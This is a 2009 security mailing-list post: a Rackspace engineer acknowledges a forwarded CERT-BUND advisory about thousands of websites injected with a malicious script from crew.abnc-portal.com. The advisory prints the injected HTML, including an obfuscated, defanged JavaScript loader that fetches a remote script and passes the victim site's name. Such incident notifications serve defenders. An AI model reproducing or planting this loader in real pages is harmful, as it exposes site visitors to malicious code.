[nsp-sec] compromised websites again (crew.abnc-portal.com)

Tue May 12 13:09:24 EDT 2009

ACK 10532, 27357, 33070, 15395, and 12200

--------------------------------------------------------------------------------
Tom Sands			  				
Chief Network Engineer				
Rackspace Hosting	    	          	
--------------------------------------------------------------------------------

Dirk Stander wrote:
> ----------- nsp-security Confidential --------
> 
> 
> 
> ------------------------------------------------------------------------
> 
> .: Hi,
> 
> I'm sending this by courtesy of Thomas Hungenberg (CERT_BUND / BSI).
> 
>     Regards, Dirk Stander (1&1) :.
> 
> =====================================================================
> 
> Hi teams,
> 
> there was a malicious javascript at <hXXp://crew.abnc-portal.com/show.js>.
> 
> A reference to this URL has been injected into thousands of compromised websites
> like this (remove XXX) - usually before the closing BODY tag:
> 
> <!-- ad --><scrXXXipt language=javascript src="hXXp://crew.abnc-portal.com/show.js"></scrXXXipt><!-- /ad -->
> 
> or
> 
> <!-- ad --><!-- ADS Blok v.0.3 --><scrXXXipt language=javaXXXscript>
> funcXXXtion sADS(sIteId) {
>         var thisHome=document;
>         var sIteName=thisHome.location.hostname;
>         var adsurl='crew%2eabnc-portal%2ecom%2F';
>         var adScript='%3Cscr'+'ipt src="http%3A%2F%2F'+adsurl+'show.js?c=';
>         thisHome.write(unescape(adScript+sIteId+'&s='+sIteName+'"%3E%3C/scr'+'ipt%3E'));
> }
> sADS("CI-002643-3");
> </scrXXXipt><!-- ADS Blok v.0.3 --><!-- /ad -->
> 
> 
> For an unknown reason, the IP address for crew.abnc-portal.com has been changed
> to 88.80.216.114 on 2009-04-22.
> 
> 88.80.216.114 is hosting the Swiss security blog 'abuse.ch'.
> This server is not malicious and has not been compromised!
> 
> By analyzing the Referer headers from the requests for /show.js that hit 88.80.216.114,
> we were able to identify compromised websites that have the above mentioned javascript
> injected into one or more pages.
> 
> Please find attached a list of 5.079 compromised hosts that showed up in the Referers
> from 2009-05-01 until 2009-05-08.
> 
> There might be some "false positives" like google.com when users visited a compromised
> website using Google translate.
> 
> 
> Cheers,
> Thomas
> 
> =====================================================================
> 
> 
> ------------------------------------------------------------------------
> 
> 
> 
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
> 
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security counter-measures.
> _______________________________________________

Confidentiality Notice: This e-mail message (including any attached or
embedded documents) is intended for the exclusive and confidential use of the
individual or entity to which this message is addressed, and unless otherwise
expressly indicated, is confidential and privileged information of Rackspace.
Any dissemination, distribution or copying of the enclosed material is prohibited.
If you receive this transmission in error, please notify us immediately by e-mail
at abuse at rackspace.com, and delete the original message.
Your cooperation is appreciated.